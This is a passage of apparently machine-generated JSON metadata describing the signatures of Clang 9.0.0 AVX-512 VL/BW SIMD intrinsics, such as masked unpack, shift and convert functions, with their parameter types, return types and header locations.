"__m256i" } }, { "tag": "function", "name": "_mm_mask_unpackhi_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1674:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_unpackhi_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1681:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_unpackhi_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1688:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_unpackhi_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1695:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_unpacklo_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1702:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_unpacklo_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1709:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_unpacklo_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1716:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_unpacklo_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1723:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_unpacklo_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1730:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_unpacklo_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1737:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_unpacklo_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1744:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_unpacklo_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1751:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_cvtepi8_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1758:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtepi8_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1766:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepi8_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1774:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvtepi8_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1782:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_cvtepu8_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1791:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvtepu8_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1799:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvtepu8_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1807:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvtepu8_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1815:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_sllv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1866:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_sllv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1872:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_sllv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1880:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_sllv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1888:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_sllv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1894:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_sllv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1902:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_sll_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1910:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_sll_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1918:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_sll_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1926:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_sll_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1934:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_slli_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1942:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_slli_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1950:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_slli_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1958:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_slli_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1966:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_srlv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1974:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_srlv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1980:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_srlv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1988:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_srlv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:1996:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_srlv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2002:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_srlv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2010:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_srav_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2018:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_srav_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2024:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_srav_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2032:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_srav_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2040:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_srav_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2046:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_srav_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2054:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_sra_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2062:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_sra_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2070:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_sra_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2078:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_sra_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2086:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_srai_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2094:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_srai_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2102:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_srai_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2110:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_srai_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2118:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_srl_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2126:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_srl_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2134:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_srl_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2142:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_srl_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2150:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_srli_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2158:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_srli_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2166:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_srli_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2174:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_srli_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2182:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_mov_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:2190:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_mov_epi16", "ns": 0, "location": 